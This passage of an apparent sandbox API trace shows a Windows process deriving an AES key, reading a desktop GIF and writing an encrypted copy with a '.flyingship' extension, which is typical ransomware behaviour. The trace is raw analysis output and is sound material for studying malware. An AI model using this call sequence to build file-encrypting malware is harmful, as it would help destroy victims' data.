lpMsg=0x61e28c) returned 0 [0075.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.793] CryptHashData (hHash=0x6b8b38, pbData=0x6f9748, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.794] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.794] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.794] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.794] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.794] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.794] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0075.794] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.795] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.795] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.795] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.795] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4n8tfmd4.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.795] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.795] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.795] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.796] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.796] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.798] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4n8tfmd4.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.800] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0075.800] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0075.800] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0075.800] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0075.801] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.801] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xdbe2, lpOverlapped=0x0) returned 1 [0075.804] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.804] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.804] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.804] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.804] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.804] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xdbe2) returned 0x795ff8 [0075.805] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.806] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.806] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.806] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.806] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.806] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.806] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xdbe2) returned 0x7a3be8 [0075.807] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.807] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.807] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.807] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xdbe2) returned 0x795ff8 [0075.807] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.807] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.808] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.808] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.808] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.808] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb418 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.808] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xdbe2) returned 0x795ff8 [0075.809] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3c8 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.809] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb528 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.809] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb588 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.809] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.809] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xdbe2) returned 0x7b17d8 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.811] RtlAllocateHeap 